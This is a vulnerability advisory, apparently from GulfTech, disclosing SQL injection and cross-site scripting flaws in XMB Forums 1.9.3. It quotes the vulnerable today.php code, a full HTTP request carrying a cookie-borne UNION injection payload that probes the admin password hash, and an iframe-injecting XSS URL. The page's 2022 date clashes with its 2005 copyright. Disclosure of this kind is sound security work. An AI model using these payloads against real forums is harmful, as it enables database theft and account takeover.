Friday February 15, 2022
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 Mambo Multiple Vulnerabilities
  3 MySQL Eventum Multiple Vulnerabilities
  4 Multiple Invision Power Board Vulnerabilities
  5 Geeklog Remote Code Execution
  6 XMB Forums Multiple Vulnerabilities
  7 Gallery 2 Multiple Vulnerabilities
  8 phpRPC Library Remote Code Execution
  9 RunCMS Multiple Vulnerabilities
10 Kayako LiveResponse Multiple Vulnerabilities
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Archives Research
XMB Forums Multiple Vulnerabilities
February 12, 2022
Vendor : XMB Software
URL : http://www.xmbforum.com/
Version : XMB Forums <= 1.9.3
Risk : Multiple Vulnerabilities


Description:
XMB Forums is a popular forum software written in php and mysql that allows you to open up your own online community or messageboard. There are a number of security issues in XMB Forums that may allow for an attacker to perform SQL injection attacks or cross site scripting attacks against the vulnerable web application. These types of attacks may allow for disclosure of sensitive data such as cookie information or contents from the underlying database.


SQL Injection:
There are a number of SQL Injection issues in XMB Forums. The first of these issues I will talk about is in 'today.php' and is present due to the lack of sanitation when attempting to handle cookie data in regards to password protected forums. 
    if ( X_MEMBER ) {
        // let's add fids for passworded forums that the user can access
        $r2 = array();
        foreach ($_COOKIE as $key=>$val) {
            if (preg_match('#^fidpw([0-9]+)$#', $key, $fetch)) {
                $r2[] = "(fid='$fetch[1]' AND password='$val')";
            }
        }
        if (count($r2) > 0) {
            $r = implode(' OR ', $r2);
            $q = $db->query("SELECT fid FROM $table_forums WHERE $r");
            while($f = $db->fetch_array($q)) {
                $fids[] = $f['fid'];
            }
        }
    }

The above code, which is taken from 'today.php' never sanitizes the variable $val which makes SQL Injection possible.

GET /today.php HTTP/1.1
Host: xmb
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Firefox/1.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://xmb/viewthread.php?tid=2&page;=1
Cookie: xmblva=1137629907; xmbuser=james; xmbpw=44cc344d25a2ffe540adbd5678e2394c;
fidpw0=') UNION SELECT uid FROM xmb_members WHERE uid=1 AND MID(password,1,1)=2/*
Cache-Control: max-age=0

For example, the above request would show any topics from the last 24hrs including ones the user does not have access to, and should not see, as long as the user with the uid of 1 has a password hash that starts with the number two. Otherwise only posts that the user has access to will be shown. Also, in addition to this SQL Injection issue are a few others that are a result of the $u2u_select array not being properly sanitized before being passed to several functions. The vulnerable functions are u2u_mod_delete(), u2u_mod_move(), and u2u_mod_markUnread(). These three vulnerable function calls are present in u2u.inc.php


Cross Site Scripting:
In addition to the previously mentioned SQL Injection issues, there is also a cross site scripting issue in the way the u2u feature handles GPC data when composing messages etc.

http:///xmb/u2u.php?action=send&username;=%22%3E%3Ciframe%3E

An attacker could use this vulnerability to steal a users cookie data and possibly take control of the victims account.


Solution:
The vendor did not respond to our contact attempts.


Credits:
James Bercegay of the GulfTech Security Research Team


Terms of Use | Disclaimer
Copyright 2005 GulfTech Research And Development, LLC. All Rights Reserved